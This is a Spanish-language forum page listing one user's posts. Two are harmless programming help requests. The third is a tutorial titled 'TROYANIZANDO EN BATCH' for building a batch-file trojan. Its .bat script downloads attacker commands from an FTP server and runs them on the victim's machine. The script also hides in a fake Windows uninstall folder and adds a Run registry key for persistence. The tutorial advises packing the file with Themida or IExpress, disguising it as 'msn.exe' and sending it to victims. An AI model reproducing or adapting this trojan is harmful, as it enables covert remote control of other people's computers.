elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Programación / Bases de Datos / Problema con wampserver en: 20 Junio 2010, 10:18 am
Hola, miren he creado una base de datos con phpmyadmin pero ahora no sé como asignarle un usuario y una contraseña.

¿Alguna ayuda por favor?

Gracias a todos y saludos!
2  Programación / Scripting / Tengo un problema con win7 y batch u.u en: 18 Junio 2010, 06:29 am
Hola foreros!

Cuando hago un delete a un archivo de texto desde la consola de windows me salta un error. Me ocurre cuando utilizo la ruta completa del archivo. Si, por ejemplo, me situo en el directorio del archivo con cd o pushd me borra el archivo.

Miren esta screen:


¿Alguna ayudita por favor?

Greetzz
3  Programación / Scripting / TROYANIZANDO EN BATCH |GUN$| en: 6 Febrero 2008, 23:14 pm
Troyanizando en batch




Indice:

->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP

_____________________________________________________________________


1.Introduccion

· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable ;) solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP ;)


2.Requisitos minimos

->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy


3.Crear cuenta FTP

->Crea tu cuenta FTP AQUI


4.Codigo para la vícitima

-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)

->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch ;) el cual sera ejecutado en el pc de la víctima

·comandos interesantes:

-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown

Más información para crear vuestro code ;)


Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP

·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez que inicie windows ;)

NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para que se ejecute en el pc de la victima cuando inicie windows ;)


5.Codigo FTP

Aqui os pongo el .bat que le tendreis que enviar a vuestra victima ;)

NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.

Citar
  @echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y  "archivo_ftp.bat"  "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit

·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima ;)
·archivo_ftp.bat:Si el archivo que le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:

Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....


6.Iexpress + Themida + Cygy para Código FTP

-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red ;)

->Tutorial + Descarga por Txshack ;)

CYGY + THEMIDA + IEXPRESS




->La explicacion a sido breve i un poco imprecisa :S  lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post ;)


_____________________________________________________________________



TUTORIAL POR GUN$

FUENTE:http://foro.infiernohacker.com/index.php?topic=2641.0
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines